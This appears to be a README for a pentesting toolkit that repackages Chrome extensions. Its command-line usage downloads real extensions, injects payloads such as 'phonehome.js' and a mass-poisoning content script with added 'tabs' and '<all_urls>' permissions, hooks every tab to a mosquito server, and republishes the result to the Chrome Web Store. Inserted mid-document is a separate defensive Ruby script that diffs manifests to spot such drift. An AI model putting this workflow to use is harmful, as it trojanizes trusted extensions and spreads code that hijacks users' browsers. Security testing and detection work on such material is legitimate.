Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments.
Authors:
- Krzysztof Kotowicz - @kkotowicz - blog
- Michele '@antisnatchor' Orru
Injector
A bunch of scripts for injecting new code into existing extensions. Extensions can be downloaded from the Chrome Web Store (repacker-webstore) or taken from crx files (repacker-crx).
Requirements:
- bash
- ruby
- zip (cmd line)
- curl (cmd line)
- Google Chrome (used in crx mode only)
Usage:
# get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/
$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js
# Same, but pack into repacked.zip instead
$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js
# Create new CRX with Google Chrome
$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js
# Inject into existing CRX file
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js
# Add some permissions into manifest.json
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy"
# Add persistent content script file launching on every tab
$ echo 'console.log(location.href)' > cs.js
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js
For example - mass poisoning every tab with mosquito:
# start mosquito server:
$ cd path/to/mosquito
$ python mosquito/start.py 8082 4444 --http 8000
# generate mosquito hook:
# - visit http://localhost:8000/generate
# - save hook as cs.js
# inject mosquito dropper into extension:
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js
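From the defender's side, the added permissions and the every-tab content script described above show up as drift in manifest.json. The following Ruby script is an added example, not part of this toolkit: it diffs a trusted manifest against the one from a copy under review, using the standard manifest keys `permissions`, `background.scripts` and `content_scripts`; the function names and sample manifests are constructed for illustration.

```ruby
require 'json'
require 'set'

# Match patterns that make a content script run on every page.
BROAD_MATCHES = Set['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*'].freeze

# Every script file a manifest references (background + content scripts).
def script_files(manifest)
  bg = manifest.dig('background', 'scripts') || []
  cs = (manifest['content_scripts'] || []).flat_map { |c| c['js'] || [] }
  (bg + cs).to_set
end

# Content-script entries whose match patterns cover all sites.
def broad_content_scripts(manifest)
  (manifest['content_scripts'] || []).select do |c|
    (c['matches'] || []).any? { |m| BROAD_MATCHES.include?(m) }
  end
end

# Diff a trusted manifest.json against the one from the copy under review.
def manifest_drift(trusted_json, suspect_json)
  trusted = JSON.parse(trusted_json)
  suspect = JSON.parse(suspect_json)
  {
    added_permissions: (suspect['permissions'] || []) - (trusted['permissions'] || []),
    added_scripts: (script_files(suspect) - script_files(trusted)).to_a.sort,
    new_broad_content_scripts: broad_content_scripts(suspect) - broad_content_scripts(trusted)
  }
end

# Constructed sample manifests (not taken from any real extension).
TRUSTED = <<~MANIFEST
  {"name": "Sample", "version": "1.0", "manifest_version": 2,
   "permissions": ["storage"],
   "background": {"scripts": ["bg.js"]}}
MANIFEST
SUSPECT = <<~MANIFEST
  {"name": "Sample", "version": "1.0", "manifest_version": 2,
   "permissions": ["storage", "tabs", "<all_urls>"],
   "background": {"scripts": ["bg.js", "extra.js"]},
   "content_scripts": [{"matches": ["<all_urls>"], "js": ["cs.js"]}]}
MANIFEST

# Print each category of drift between the two sample manifests.
manifest_drift(TRUSTED, SUSPECT).each { |kind, items| puts "#{kind}: #{items.inspect}" }
```

Any non-empty category means the copy requests more than the trusted version did and should be reviewed before it is allowed in a managed browser.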
Webstore Uploader
Script for uploading and publishing Chrome Extensions packed in zip files to the Chrome Web Store.
Requirements:
- ruby
Usage:
# Preparation:
1. Create Chrome developer account
2. Login at https://chrome.google.com/webstore/developer/dashboard/
3. Pay your $5 one-time fee (credit card needed)
4. Get SID, SSID, HSID cookies and paste their values in webstore_uploader/config.rb file
# Get Chrome extension code
# e.g. run Injector in zip mode:
$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js
# (optional) - prepare screenshot / description file
# publish the extension right away
$ ruby webstore_uploader/webstore_upload.rb repacked.zip publish description.txt screenshot.png
# or just upload & save it:
$ ruby webstore_uploader/webstore_upload.rb repacked.zip save description.txt screenshot.png
# you can access the extension from your developer dashboard